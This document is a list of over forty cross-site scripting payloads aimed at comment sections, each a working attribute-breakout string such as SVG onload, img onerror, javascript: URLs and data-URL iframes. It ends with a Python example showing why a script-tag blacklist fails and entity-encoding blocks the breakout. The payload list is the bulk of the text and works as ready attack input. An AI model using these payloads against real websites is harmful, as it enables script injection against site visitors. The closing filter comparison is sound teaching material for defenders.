# XSS Payloads for Comments Section
- `"><svg/onload=alert(1)>` : SVG tag with onload event to trigger JavaScript.
- `"><img src=x onerror=alert(1)>` : Image tag with onerror event to execute JavaScript.
- `"><script>alert(1)</script>` : Simple script tag to execute JavaScript.
- `"><iframe src="javascript:alert(1)"></iframe>` : Iframe tag with JavaScript source to execute alert.
- `"><input type="text" value="<script>alert(1)</script>">` : Input field with embedded script tag.
- `"><body onload=alert(1)>` : Body tag with onload event to execute JavaScript.
- `"><img src=x onerror="this.onerror=null;alert(1)">` : Image tag with self-nullifying onerror event.
- `"><audio src=x onerror=alert(1)>` : Audio tag with onerror event to trigger JavaScript.
- `"><video src=x onerror=alert(1)>` : Video tag with onerror event to execute alert.
- `"><marquee onstart=alert(1)>` : Marquee tag with onstart event to execute JavaScript.
- `"><object data="data:text/html,<script>alert(1)</script>"></object>` : Object tag with data URL containing JavaScript.
- `"><embed src="data:text/html,<script>alert(1)</script>">` : Embed tag with data URL containing JavaScript.
- `"><form action="javascript:alert(1)"><input type="submit"></form>` : Form tag with action attribute set to JavaScript.
- `"><link rel="stylesheet" href="javascript:alert(1)">` : Link tag with href attribute set to JavaScript.
- `"><svg><desc><![CDATA[</desc><script>alert(1)//]]></script>` : SVG tag with CDATA section to execute JavaScript.
- `"><math><maction xlink:href="javascript:alert(1)">click</maction></math>` : MathML tag with xlink attribute for JavaScript.
- `"><meta http-equiv="refresh" content="0;url=javascript:alert(1)">` : Meta tag with refresh attribute set to JavaScript.
- `"><input type="button" onclick=alert(1) value="Click me">` : Input button with onclick event to trigger alert.
- `"><textarea onfocus=alert(1) autofocus>` : Textarea with onfocus event to execute JavaScript.
- `"><select onfocus=alert(1) autofocus><option>1</option></select>` : Select element with onfocus event to execute alert.
- `"><svg><use xlink:href="javascript:alert(1)"></use></svg>` : SVG use tag with xlink attribute set to JavaScript.
- `"><div style="width: expression(alert(1));">` : Div tag with CSS expression to execute JavaScript.
- `"><a href="javascript:alert(1)">Click me</a>` : Anchor tag with href attribute set to JavaScript.
- `"><input type="image" src="javascript:alert(1);">` : Input image with src attribute set to JavaScript.
- `"><form><button formaction="javascript:alert(1)">Submit</button></form>` : Form with button formaction attribute set to JavaScript.
- `"><img src=x onerror="alert(String.fromCharCode(88,83,83))">` : Image tag with onerror event using String.fromCharCode to execute alert.
- `"><iframe src="data:text/html,<script>alert(1)</script>"></iframe>` : Iframe with data URL containing JavaScript.
- `"><script>alert(1)//` : Script tag with single-line comment to break out of attributes.
- `"><svg/onmouseover=alert(1)>` : SVG tag with onmouseover event to execute JavaScript.
- `"><div onclick=alert(1)>Click me</div>` : Div tag with onclick event to trigger alert.
- `"><meta content="text/html; charset=UTF-7"><script>alert(1)</script>` : Meta tag with charset attribute set to UTF-7.
- `"><img src=x onmouseover=alert(1)>` : Image tag with onmouseover event to execute alert.
- `"><div style="background:url('javascript:alert(1)')">` : Div tag with CSS background URL containing JavaScript.
- `"><svg/onmouseenter=alert(1)>` : SVG tag with onmouseenter event to execute JavaScript.
- `"><svg/onmouseleave=alert(1)>` : SVG tag with onmouseleave event to execute JavaScript.
- `"><svg/onfocus=alert(1)>` : SVG tag with onfocus event to execute JavaScript.
- `"><svg/onblur=alert(1)>` : SVG tag with onblur event to execute JavaScript.
- `"><div id="x" style="width:100px;height:100px;" onclick="alert(1)">Click me</div>` : Div tag with id, style, and onclick attributes to trigger alert.
- `"><div style="background:url(javascript:alert(1));">` : Div tag with CSS background URL containing JavaScript.
- `"><img src=x:alert(1) onerror=eval(src)>` : Image tag with eval in onerror attribute to execute JavaScript.
- `"><input type="text" value='1 & onmouseover="alert(1)" autofocus>` : Input field with onmouseover event to execute JavaScript.
- `"><img src=x onerror=alert(String.fromCharCode(88,83,83))>` : Image tag with onerror event using String.fromCharCode to execute alert.
- `"><script src="data:text/javascript,alert(1);"></script>` : Script tag with data URL containing JavaScript.
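Every payload above opens with `">` to close the attribute the comment is echoed into and then open a new tag. As an added example (not code from this repository), the block below feeds a few of those payloads through two comment renderers: a blacklist that only strips `<script>` tags, which every attribute-breakout payload survives, and entity-encoding of the attribute context, which leaves no raw quote or angle bracket to break out with. The payload subset and the helper names are constructed for this example.

```python
import html
import re

# Constructed sample comment bodies, taken from the payloads listed above.
PAYLOADS = [
    '"><svg/onload=alert(1)>',
    '"><img src=x onerror=alert(1)>',
    '"><script>alert(1)</script>',
    '"><a href="javascript:alert(1)">Click me</a>',
    '"><input type="text" value=\'1 & onmouseover="alert(1)" autofocus>',
    '"><script>alert(1)//',
]

_SCRIPT_TAG = re.compile(r"(?i)</?script[^>]*>")


def strip_script_tags(comment: str) -> str:
    """Naive blacklist filter: removes only <script> tags and nothing else.
    Kept as the 'before' renderer so the checks below can show why it fails."""
    return _SCRIPT_TAG.sub("", comment)


def escape_for_attribute(comment: str) -> str:
    """Hardened renderer for the double-quoted attribute context the payloads
    target: <, >, &, " and ' are all entity-encoded, so the leading quote and
    angle bracket of each payload become inert text."""
    return html.escape(comment, quote=True)


def render_comment_field(comment: str) -> str:
    """Full markup the comment is echoed into, using the hardened escaper."""
    return f'<input type="text" value="{escape_for_attribute(comment)}">'


def can_break_out(rendered: str) -> bool:
    """True if the rendered string still contains a raw quote or angle bracket,
    i.e. could close the attribute or open a new tag."""
    return any(ch in rendered for ch in '"\'<>')


def survives_blacklist(comment: str) -> bool:
    return can_break_out(strip_script_tags(comment))


def neutralised_by_escaping(comment: str) -> bool:
    return not can_break_out(escape_for_attribute(comment))
```

Entity-encoding only defeats breakout from a quoted attribute; a comment placed into a URL-valued attribute such as `href` or `src` additionally needs a scheme allowlist, since `javascript:` survives escaping unchanged.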